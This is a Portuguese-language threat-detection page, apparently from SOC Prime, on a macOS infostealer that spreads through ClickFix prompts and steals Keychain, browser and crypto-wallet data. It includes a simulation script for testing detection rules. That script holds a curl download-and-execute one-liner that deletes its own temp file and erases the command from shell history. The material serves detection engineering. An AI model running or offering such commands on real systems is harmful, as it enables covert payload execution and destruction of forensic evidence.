SOC Prime Bias: Alto

10 Aug 2026 17:15 UTC

macOS Infostealer Alvo Cryptomoedas

Author Photo
SOC Prime Team linkedin icon Seguir
macOS Infostealer Alvo Cryptomoedas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um ladrão de macOS baseado em Go está atacando usuários de criptomoedas através de uma campanha de engenharia social chamada ClickFix. O malware rouba credenciais sensíveis do Apple Keychain e dos armazenamentos de navegador, além de ter a capacidade de esvaziar gradualmente os saldos de criptomoedas das carteiras das vítimas. A cadeia de infecção começa com um script de shell profiler que entrega payloads Mach-O específicos de arquitetura.

Investigação

Os analistas da Huntress descobriram a ameaça durante uma caçada retrospectiva e identificaram componentes de um ladrão específico para macOS que permaneceram ativos por cerca de três meses. A investigação vinculou a infraestrutura de suporte ao Aeza Group, um provedor de hospedagem à prova de balas russo sancionado. Pesquisadores reconstruíram a cadeia de ataque desde o prompt inicial de engenharia social do ClickFix até a execução final do payload e comunicação C2.

Mitigação

Os usuários devem evitar interagir com prompts de CAPTCHA suspeitos ou seguir instruções incomuns que exijam comandos a serem inseridos no Terminal. Extensões de navegador projetadas para restringir scripts maliciosos, como NoScript, e ferramentas de bloqueio baseadas em DNS, como Pi-hole, podem ajudar a reduzir a exposição. Treinamento abrangente de conscientização de usuário focado em engenharia social ClickFix permanece uma das defesas mais eficazes.

Resposta

Se uma infecção for detectada, o sistema macOS afetado deve ser isolado imediatamente para impedir mais exfiltração de dados ou esgotamento da carteira de criptomoedas. Os administradores devem localizar e remover todos os binários Mach-O maliciosos e seus mecanismos de persistência associados. Como o malware tem como alvo credenciais, as senhas de todas as contas acessadas a partir do dispositivo comprometido devem ser redefinidas.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check Pre-flight de Telemetria & Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa de Ataque & Comandos: O adversário inicia um golpe ClickFix. A vítima é enganada para executar um comando em seu terminal. O comando usa curl -kFsSL para baixar um script malicioso silenciosamente. Para evitar deixar rastro, o script é executado via uma linha única de bash que exclui imediatamente seu próprio arquivo temporário (.UlaccK). Finalmente, o atacante executa um comando complexo history para remover cirurgicamente o comando do histórico do shell do usuário, tornando o ataque invisível à inspeção forense casual.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Simulação do Ataque de Malware ClickFix macOS
    # Este script imita os padrões exatos de string exigidos pela regra de detecção.
    
    echo "[+] Iniciando Simulação..."
    
    # 1. Simular o download do curl (Seleção 3)
    # 2. Simular a execução do bash e exclusão imediata (Seleção 1)
    # 3. Simular a manipulação do histórico (Seleção 2)
    
    # Combinamos esses em uma única linha para imitar o padrão comportamental
    # Nota: Usamos uma URL fictícia para evitar execução real do malware
    curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}')
    
    echo "[+] Comando de Simulação Executado."
    echo "[!] Verifique seu SIEM para o alerta de 'Ataque de Malware de macOS que Esvazia Carteiras'."
  • Comandos de Limpeza:

    # Remover quaisquer artefatos deixados pela simulação
    rm -f .UlaccK
    # Nota: Manipulação de histórico no script destina-se a simular evasão;
    # restauração manual do histórico pode ser necessária para o usuário de teste.